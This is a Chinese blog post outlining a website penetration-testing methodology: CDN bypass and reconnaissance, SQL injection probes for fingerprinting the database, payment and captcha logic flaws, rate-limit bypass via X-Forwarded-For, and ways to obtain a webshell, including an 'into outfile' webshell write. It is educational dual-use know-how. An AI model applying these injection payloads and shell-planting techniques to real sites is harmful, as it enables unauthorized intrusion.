<!DOCTYPE html>
<html lang=zh>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>一个网站的渗透思路 | Hexo</title>
  <meta name="description" content="一个网站的渗透思路信息收集信息收集网站 1https:&#x2F;&#x2F;www.shodan.io&#x2F;   判断网站是否存在cdn  什么是cdn？ CDN的全称是Content Delivery Network，即内容分发网络。其目的是通过在现有的internet中增加一层新的网络架构，将网站的内容发布到最接近用户的网络边缘，使用户可以就近取得所需的内容，提高用户访问网站的响应速度">
<meta property="og:type" content="article">
<meta property="og:title" content="一个网站的渗透思路">
<meta property="og:url" content="http://s1eady.top/2020/10/23/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E4%B8%80%E4%B8%AA%E7%BD%91%E7%AB%99%E7%9A%84%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AF/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="一个网站的渗透思路信息收集信息收集网站 1https:&#x2F;&#x2F;www.shodan.io&#x2F;   判断网站是否存在cdn  什么是cdn？ CDN的全称是Content Delivery Network，即内容分发网络。其目的是通过在现有的internet中增加一层新的网络架构，将网站的内容发布到最接近用户的网络边缘，使用户可以就近取得所需的内容，提高用户访问网站的响应速度">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201111235353259.png">
<meta property="og:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201110222106564.png">
<meta property="article:published_time" content="2020-10-23T13:21:43.000Z">
<meta property="article:modified_time" content="2020-11-11T15:56:21.797Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201111235353259.png">
  <!-- Canonical links -->
  <link rel="canonical" href="http://s1eady.top/2020/10/23/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E4%B8%80%E4%B8%AA%E7%BD%91%E7%AB%99%E7%9A%84%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AF/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 5.2.0"></head>


<body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/cofess" target="_blank">
          <img class="img-circle img-rotate" src="/images/1.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">果冻</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">Penetration Testing</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> 中国 南京</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">分类</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">关于</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="/GXA111666" target="_blank" title="VX" data-toggle=tooltip data-placement=top><i class="icon icon-VX"></i></a></li>
        
        <li><a href="/1252195810" target="_blank" title="QQ" data-toggle=tooltip data-placement=top><i class="icon icon-QQ"></i></a></li>
        
        <li><a href="/1252195810@qq.com" target="_blank" title="E-Mail" data-toggle=tooltip data-placement=top><i class="icon icon-E-mail"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>深山夕照深秋雨 一往情深深几许</p>
            </div>
        </div>
    </div>
</div>

    
  </div>
</aside>

  
  
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <nav id="toc" class="article-toc">
      <h3 class="toc-title">文章目录</h3>
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E4%B8%AA%E7%BD%91%E7%AB%99%E7%9A%84%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AF"><span class="toc-number">1.</span> <span class="toc-text">一个网站的渗透思路</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98"><span class="toc-number">1.2.</span> <span class="toc-text">漏洞挖掘</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">1.3.</span> <span class="toc-text">权限提升</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AB%99%E5%BA%93%E5%88%86%E7%A6%BB"><span class="toc-number">1.4.</span> <span class="toc-text">站库分离</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BB%8Eweb%E5%85%A5%E5%8F%A3"><span class="toc-number">1.4.1.</span> <span class="toc-text">从web入口</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BB%8E%E6%95%B0%E6%8D%AE%E5%BA%93%E5%85%A5%E5%8F%A3%E6%B8%97%E9%80%8F"><span class="toc-number">1.4.2.</span> <span class="toc-text">从数据库入口渗透</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%AB%99%E5%BA%93%E5%88%86%E7%A6%BB%E7%9A%84%E5%88%A4%E6%96%AD%E6%96%B9%E6%B3%95"><span class="toc-number">1.4.3.</span> <span class="toc-text">站库分离的判断方法</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E7%BD%91%E7%BB%9C%E8%BF%9E%E6%8E%A5%E7%8A%B6%E6%80%81"><span class="toc-number">1.4.3.1.</span> <span class="toc-text">查看网络连接状态</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E5%BD%93%E5%89%8D%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84IP"><span class="toc-number">1.4.3.2.</span> <span class="toc-text">查看当前服务器的IP</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%AB%99%E5%BA%93%E5%88%86%E7%A6%BB%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="toc-number">1.4.4.</span> <span class="toc-text">站库分离利用思路</span></a></li></ol></li></ol></li></ol>
    </nav>
  </div>
</aside>

<main class="main" role="main">
  <div class="content">
  <article id="post-渗透测试--一个网站的渗透思路" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      一个网站的渗透思路
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2020/10/23/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E4%B8%80%E4%B8%AA%E7%BD%91%E7%AB%99%E7%9A%84%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AF/" class="article-date">
	  <time datetime="2020-10-23T13:21:43.000Z" itemprop="datePublished">2020-10-23</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
  </span>

        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a>
  </span>


        

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2020/10/23/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E4%B8%80%E4%B8%AA%E7%BD%91%E7%AB%99%E7%9A%84%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AF/#comments" class="article-comment-link">评论</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h3 id="一个网站的渗透思路"><a href="#一个网站的渗透思路" class="headerlink" title="一个网站的渗透思路"></a>一个网站的渗透思路</h3><h4 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h4><p>信息收集网站</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.shodan.io&#x2F;</span><br></pre></td></tr></table></figure>

<ul>
<li><p>判断网站是否存在cdn</p>
<ul>
<li><p>什么是cdn？</p>
<p>CDN的全称是Content Delivery Network，即内容分发网络。其目的是通过在现有的internet中增加一层新的网络架构，将网站的内容发布到最接近用户的网络边缘，使用户可以就近取得所需的内容，提高用户访问网站的响应速度。</p>
<p>具体流程为: 用户在自己的浏览器中输入要访问的网站的域名，浏览器向本地DNS请求对该域名的解析，本地DNS将请求发到网站的主DNS，主DNS根据一系列的策略确定当时最适当的CDN节点，并将解析的结果（IP地址）发给用户，用户向给定的CDN节点请求相应网站的内容。</p>
</li>
<li><p>为什么要绕过cdn？</p>
<p>由于CDN节点的阻挡防护，可以更好的保护员服务器的安全。具体来说，CDN其实是充当了一个替身的角色，无论服务器是渗透还是DD0S攻击，攻击的目标都将是CDN节点，这样一来便间接的保护了网站本身。</p>
</li>
<li><p>判断是否有cdn的方式</p>
<ul>
<li><p>Nslookup命令–查看是否返回多个IP，如果返回多个IP则表示存在CDN，否则可能不存在CDN。</p>
<p>可以看到有多个IP。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ nslookup jd.com</span><br><span class="line">Server:		114.114.114.114</span><br><span class="line">Address:	114.114.114.114#53</span><br><span class="line"></span><br><span class="line">Non-authoritative answer:</span><br><span class="line">Name:	jd.com</span><br><span class="line">Address: 111.13.149.108</span><br><span class="line">Name:	jd.com</span><br><span class="line">Address: 120.52.148.118</span><br><span class="line">Name:	jd.com</span><br><span class="line">Address: 118.193.98.63</span><br></pre></td></tr></table></figure>
</li>
<li><p>使用在线网站查看–如果有多个IP则存在CDN，如果只有一个IP则不存在CDN</p>
<p>常见网站</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">爱站:     https:&#x2F;&#x2F;ping.aizhan.com&#x2F;</span><br><span class="line">站长之家:  http:&#x2F;&#x2F;ping.chinaz.com&#x2F;</span><br></pre></td></tr></table></figure>
</li>
<li><p>使用工具直接查询</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.ipip.net&#x2F;ip.html</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>绕过CDN的方式</p>
<ul>
<li><p>查找子域名</p>
<p>因为CDN架设需要钱，所以有的站点只给主域名架上CDN，而子域名一般不架设CDN。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1.oneforall 查找子域名</span><br><span class="line">2、Google hacker 查找子域名</span><br><span class="line">3、site:baidu.com -www</span><br></pre></td></tr></table></figure>
</li>
<li><p>让服务器主动给我们发送邮箱，邮箱系统很多都在内部，没有经过解析，可以在邮件源码里面找到服务的真实的</p>
</li>
<li><p>历史DNS记录</p>
<p>查询ip与域名绑定历史记录，会发现使用cdn之前的目标ip。</p>
<p>使用网站查询之前绑定的域名。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.ip138.com&#x2F;</span><br><span class="line">https:&#x2F;&#x2F;dnsdb.io&#x2F;zh-cn&#x2F;</span><br><span class="line">https:&#x2F;&#x2F;x.threatbook.cn&#x2F;</span><br><span class="line">https:&#x2F;&#x2F;sitereport.netcraft.com&#x2F;</span><br><span class="line">http:&#x2F;&#x2F;viewdns.info&#x2F;</span><br><span class="line">http:&#x2F;&#x2F;www.17ce.com&#x2F;</span><br></pre></td></tr></table></figure>
</li>
<li><p>利用网站漏洞</p>
<p>phpinfo敏感信息泄漏等等，如果存在web漏洞让服务器主动向我们请求链接，我们可以获取目标站点的真实ip。</p>
<p>可以尝试反弹shell到我们的主机。</p>
</li>
<li><p>cert证书查询</p>
<p>转化成十进制,使用fofa搜索。</p>
<p>fofa语法–<code>cert=&quot;十进制&quot;</code></p>
<p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201111235353259.png" alt="image-20201111235353259"></p>
</li>
<li><p>在国外ping–网站在国外没有CDN</p>
<p>使用国外的网站ping</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;asm.ca.com&#x2F;en&#x2F;ping.php</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>绕过之后开始渗透</p>
<p>把真实的ip与目标域名在hosts文件中绑定。</p>
<p>或者直接访问目标的ip而不是访问域名。</p>
</li>
</ul>
</li>
<li><p>网站信息</p>
<ul>
<li><p>使用burp抓包、放包，在返回包中可以看到使用的系统、脚本语言、服务类型以及waf类型等等。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">HTTP&#x2F;1.1 200 OK</span><br><span class="line">Content-Type: text&#x2F;html; charset&#x3D;gb2312</span><br><span class="line">Vary: Accept-Encoding</span><br><span class="line">Server: Microsoft-IIS&#x2F;8.5</span><br><span class="line">X-Powered-By: WAF&#x2F;2.0</span><br><span class="line">Date: Mon, 21 Sep 2020 12:02:33 GMT</span><br><span class="line">Connection: close</span><br><span class="line">Content-Length: 9173</span><br></pre></td></tr></table></figure>
</li>
<li><p>使用谷歌插件–Wappalyzer 查看网站的基本信息，比如web服务、脚本语言等等。</p>
</li>
<li><p>判断数据库类型</p>
<p>数据库本身的特性</p>
<ul>
<li>access数据库，数据库文件后缀为.mdb，一般配合的脚本语言为asp。为小型数据库。</li>
<li>SQL Server数据库，数据库文件后缀为.mdf，一般配合的脚本语言为asp。端口号为1433。</li>
<li>mysql数据库，数据库后缀文件为,sql，一般配合的脚本语言为php，端口号为3306。</li>
<li>Oracle数据库，端口号为1521。</li>
</ul>
<p>sql注入判断数据库类型</p>
<ul>
<li><p>特有的函数</p>
<ul>
<li><p>通过使用查看数据库版本的函数，比如mysql的version()、@@version函数</p>
</li>
<li><p>substring和substr</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">在mssql、mysql中可以调用substring。oracle则只可调用substr</span><br></pre></td></tr></table></figure>
</li>
<li><p>其他的一些函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sql server: @@pack_received @@rowcount</span><br><span class="line">mysql:connection_id() last_insert_id() row_count()</span><br><span class="line">orcale:bitand(1,1)</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>对字符串的处理方式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sql server ：id&#x3D;1 and &#39;a&#39;+&#39;b&#39;&#x3D;&#39;ab&#39; --</span><br><span class="line">mssql:id&#x3D;1 and &#39;a&#39;+&#39;b&#39;&#x3D;&#39;ab&#39;</span><br><span class="line">mysql:id&#x3D;1 and &#39;a&#39;+&#39;b&#39;&#x3D;&#39;ab&#39; ， &#39;ab&#39;&#x3D;concat(&#39;a&#39;,&#39;b&#39;)</span><br><span class="line">oracle:id&#x3D;1 and &#39;a&#39;+&#39;b&#39;&#x3D;&#39;a&#39;||&#39;b&#39; ，&#39;ab&#39;&#x3D;concat(&#39;a&#39;,&#39;b&#39;)</span><br><span class="line">postgresql :id&#x3D;1 and &#39;a&#39;+&#39;b&#39;&#x3D;&#39;a&#39;||&#39;b&#39; ,&#39;ab&#39;&#x3D;concat(&#39;a&#39;,&#39;b&#39;)</span><br></pre></td></tr></table></figure>
</li>
<li><p>特殊符号以及注释</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">“&#x2F;*”是MySQL中的注释符，返回错误说明该注入点不是MySQL</span><br><span class="line">“--”是Oracle和MSSQL支持的注释符，如果返回正常，则说明为这两种数据库类型之一。</span><br><span class="line">“;”是子句查询标识符，Oracle不支持多行查询，因此如果返回错误，则说明很可能是Oracle数据库</span><br></pre></td></tr></table></figure>
</li>
<li><p>根据返回的报错类型</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">ORACLE</span><br><span class="line">ORA-01756:quoted string not properly terminated</span><br><span class="line">ORA-00933:SQLcommand not properly ended</span><br><span class="line">MS-SQL</span><br><span class="line">Msg 170,level 15, State 1,Line 1</span><br><span class="line">Line 1:Incorrect syntax near ‘foo</span><br><span class="line">Msg 105,level 15,state 1,Line 1</span><br><span class="line">Unclose quotation mark before the character string ‘foo</span><br><span class="line">MYSQL</span><br><span class="line">you have an error in your SQL syntax,check the manual that corresponds to you mysql server version for the right stntax to use near ‘’foo’ at line x</span><br></pre></td></tr></table></figure>
</li>
<li><p>各个数据库特有的表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">1、mssql数据库</span><br><span class="line"></span><br><span class="line"> http:&#x2F;&#x2F;127.0.0.1&#x2F;test.php?id&#x3D;1 and (select count(*) from sysobjects)&gt;0 and 1&#x3D;1</span><br><span class="line">2、access数据库</span><br><span class="line"></span><br><span class="line"> http:&#x2F;&#x2F;127.0.0.1&#x2F;test.php?id&#x3D;1 and (select count(*) from msysobjects)&gt;0 and 1&#x3D;1</span><br><span class="line">3、mysql数据库(mysql版本在5.0以上)</span><br><span class="line"></span><br><span class="line">  http:&#x2F;&#x2F;127.0.0.1&#x2F;test.php?id&#x3D;1 and (select count(*) from information_schema.TABLES)&gt;0 and 1&#x3D;1</span><br><span class="line">4、oracle数据库</span><br><span class="line"></span><br><span class="line">  http:&#x2F;&#x2F;127.0.0.1&#x2F;test.php?id&#x3D;1 and (select count(*) from sys.user_tables)&gt;0 and 1&#x3D;1</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>目录扫描</p>
<p>dirsearch、dirmap、dirb、御剑扫描工具。</p>
</li>
<li><p>端口扫描</p>
<p>namp、Masscan、msf</p>
</li>
<li><p>子域名信息收集</p>
<ul>
<li><p>oneforall、知道创宇实验室ksubdomain</p>
</li>
<li><p>谷歌hacker语法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">site:baidu.com -www</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>网站CMS</p>
<p>判断网站CMS类型</p>
<ul>
<li><p>cms特有的文件路径</p>
<p>比如WordPress的常用路径为wp-admin等等。</p>
</li>
<li><p>robots.txt文件中会列出一些禁止爬的目录。</p>
</li>
<li><p>查看版权信息</p>
<ul>
<li>网页的最底部可能会有版权信息。</li>
<li>网页前台的源代码中可能会有注释的版权信息。</li>
</ul>
</li>
</ul>
<p>常见的cms扫描工具</p>
<p>WordPress的专用扫描工具，wpscan。</p>
<p>CMSmap可以扫描WordPress，Joomla和Drupal。</p>
<p>判断出CMS之后可以搜索以往的cms漏洞，或者找到源码审计一下。</p>
</li>
<li><p>操作系统的判断</p>
<ul>
<li><p>nmap 参数-O表示扫描操作系统信息</p>
</li>
<li><p>ping命令 </p>
<p>TTL起始值:</p>
<p>Windows xp 128 (广域网中TTL为65-128)</p>
<p>Linux/Unix64(广域网中TTL为1-64)</p>
</li>
<li><p>大小写</p>
<p>Linux系统对大小写敏感</p>
<p>window系统对大小写不敏感</p>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h4 id="漏洞挖掘"><a href="#漏洞挖掘" class="headerlink" title="漏洞挖掘"></a>漏洞挖掘</h4><ul>
<li><p>owasp top 10漏洞挖掘</p>
<ul>
<li><p>sql注入漏洞</p>
</li>
<li><p>逻辑漏洞</p>
<p>支付漏洞</p>
<ul>
<li><p>任意金额修改</p>
<p>利用：抓包直接修改金额，可减少支付金额，也可修改为负的金额。</p>
<p>防御：</p>
<p>1、将商品ID和订单金额进行哈希加密，当用户修改金额之后再一次进行哈希加密并与原本的哈希值进行比较。</p>
<p>2、敏感参数不要放在url中。</p>
</li>
<li><p>请求重放</p>
<p>利用：</p>
<p>购买成功后，重放其中请求，竟然可以使购买商品一直增加。</p>
</li>
</ul>
<p>cookie缺陷</p>
<ul>
<li>token可以获取(前端爬虫)</li>
<li>cookie重复利用</li>
<li>cookie可枚举</li>
<li>cookie使用简单的加密算法</li>
</ul>
<p>验证码漏洞</p>
<ul>
<li><p>验证码绕过</p>
<p>原因：直接让验证码参数值为空，或者直接删掉验证码参数名，可导致绕过。</p>
</li>
<li><p>验证码回显</p>
<p>原因：验证码由前端即客户端生成，可在请求包中直接获取验证码。比如，前端源码、cookie中存在验证码。</p>
<p>利用：利用脚本提取验证码，直接暴力破解。</p>
<p>防御：</p>
<p>1、后端生成验证码。</p>
</li>
<li><p>验证码重复利用与验证码暴力破解</p>
</li>
<li><p>绕过防暴力破解</p>
<ul>
<li><p>限制IP</p>
<p>X-Forwarded-For绕过</p>
<p>在请求包中增加XFF报头即可，然后使用burp并将其也设置为一个intruder payload即可。</p>
</li>
<li><p>服务端只对失败次数进行了校验，当登录成功之后失败次数清0.</p>
<p>注册一个用户，将注册的用户(知道密码，成功登录之后会清零登录限制次数)与要暴力破解的用户放在一起。比如：正常用户steady，其他测试用户boy、sadjh、sadkh。可以生成一下字典：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">steady</span><br><span class="line">  boy</span><br><span class="line">  boy</span><br><span class="line">  sadjh</span><br><span class="line">  steady</span><br><span class="line">  steady</span><br><span class="line">  boy</span><br><span class="line">  boy</span><br><span class="line">  sadjh</span><br><span class="line">  steady</span><br></pre></td></tr></table></figure>

</li>
</ul>
</li>
</ul>
<p>越权漏洞</p>
<ul>
<li>水平越权与垂直越权</li>
</ul>
<p>密码找回漏洞</p>
<ul>
<li><p>sql注入漏洞</p>
</li>
<li><p>某些字符标志可以组成url直接跳过验证</p>
</li>
<li><p>修改响应包</p>
<p>发送请求包，然后让响应包作为请求包，修改其中的敏感信息，然后再次发包。</p>
</li>
<li><p>跳过验证步骤(常见参数step)</p>
<ul>
<li>修改某些参数，可跳过认证步骤。</li>
</ul>
</li>
<li><p>替换用户账号或用户表示(uid、手机号、账号)</p>
<ul>
<li>两个账户测试，先使用一个账户B找回，然后把账号修改为A，最终成功修改A的账号。也可以直接复制数据包，只修改某些用户表示。</li>
</ul>
</li>
<li><p>删除某些参数可直接绕过验证</p>
</li>
<li><p>用户凭证在返回包中</p>
<ul>
<li>用户发送请求包，可以直接看到token信息、验证码</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p>常见GetShell方式</p>
<p>owasp top 10漏洞拿shell</p>
<ul>
<li><p>sql注入拿shell</p>
<ul>
<li><p>sqlmap –os-shell</p>
</li>
<li><p>sql注入漏洞直接写入shell</p>
<p>联合注入、报错注入、堆叠注入</p>
</li>
<li><p>日志文件拿shell(可以配合堆叠注入)</p>
</li>
<li><p>sqlmap –sql-shell 能够执行sql语句之后，在写shell</p>
</li>
</ul>
</li>
<li><p>phpadmin拿shell</p>
<ul>
<li>日志文件拿shell</li>
<li>直接执行sql语句那shell</li>
</ul>
</li>
<li><p>命令执行拿shell</p>
<ul>
<li>直接写shell到目标文件夹下面</li>
<li>执行系统命令、调用脚本语言反弹shell</li>
</ul>
</li>
<li><p>文件上传拿shell</p>
<ul>
<li>直接上传shell文件</li>
<li>上传一个具有写shell功能的文件，访问文件直接写入shell</li>
<li>上传一个具有命令执行的文件，然后执行命令写shell</li>
</ul>
</li>
<li><p>文件包含漏洞拿shell</p>
<ul>
<li>远程包含文件，将shell写入站点。</li>
<li>包含session文件</li>
<li>phpinfo本地包含临时文件</li>
</ul>
</li>
</ul>
<p>网站功能点上传shell</p>
<ul>
<li><p>后台上传插件拿shell</p>
</li>
<li><p>后台数据库备份拿shell</p>
<p>数据库备份拿shell就是把我们sql语句放入数据库备份文件中,然后上传到服务器,服务器执行sql数据库备份文件进而执行我们的sql语句 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &quot;一句话&quot; into outfile “路径”</span><br></pre></td></tr></table></figure>

<p>这里的路径一定要是全路径,不能只是一个文件名,如果只写相对路径或者文件名,文件会存储到服务器中的mysql所在的文件夹中</p>
</li>
<li><p>后台编辑前台模版文件拿shell</p>
</li>
</ul>
</li>
<li><p>其他漏洞挖掘方式</p>
<ul>
<li><code>www.xxx.com\www.xxx.com.zip|rar</code>直接拖源码</li>
</ul>
</li>
</ul>
